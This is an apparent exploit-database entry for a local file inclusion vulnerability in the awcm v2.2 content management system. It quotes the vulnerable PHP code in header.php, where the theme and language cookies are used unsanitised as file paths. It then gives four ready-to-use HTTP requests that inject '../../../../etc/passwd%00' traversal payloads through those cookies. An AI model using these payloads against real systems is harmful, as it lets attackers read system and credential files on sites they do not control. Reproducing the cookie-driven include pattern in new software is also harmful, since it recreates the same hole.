扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
[+]Exploit Title: [awcm v2.2 final Local File Inclusion] [+]Date: [26-01-2011] [+]Author: Cucura , Ste@lth (Bl@ck_Falc0n) [+]Software Link: [www.awcm-cms.com] [+]Version: [v2.2] [+]CVE : - [+]Contact: Blackcucura[at]Gmail.com http://sourceforge.net/projects/awcm/files/ ----------------------------------------------------------------- Vuln C0dein header.php if(isset($_COOKIE['awcm_theme'])) { $theme_file = $_COOKIE['awcm_theme']; } else { $theme_file = $mysql_maininfo_row['defult_theme']; } if(isset($_COOKIE['awcm_lang'])) { $lang_file = $_COOKIE['awcm_lang']; } else { $lang_file = $mysql_maininfo_row['defult_language']; } ----------------------------------------------------------------- [+]Exploit: http://target/awcm/index.php GET http://192.168.43.173/awcm/index.php HTTP/1.0 Cookie: awcm_theme=../../../../etc/passwd%00; [+]Exploit: http://target/awcm/index.php GET http://192.168.43.173/awcm/index.php HTTP/1.0 Cookie: awcm_lang=../../../../etc/passwd%00; [+]Exploit: http://target/awcm/header.php GET http://192.168.43.173/awcm/header.php HTTP/1.0 Cookie: awcm_lang=../../../../etc/passwd%00; [+]Exploit: http://target/awcm/header.php GET http://192.168.43.173/awcm/header.php HTTP/1.0 Cookie: awcm_theme=../../../../etc/passwd%00; ----------------------------------------------------------------- Greetz : SpeeDr00t, ReDr0se, InsideJ , eidisky Bl@ck Falc0n Team |
体验盒子
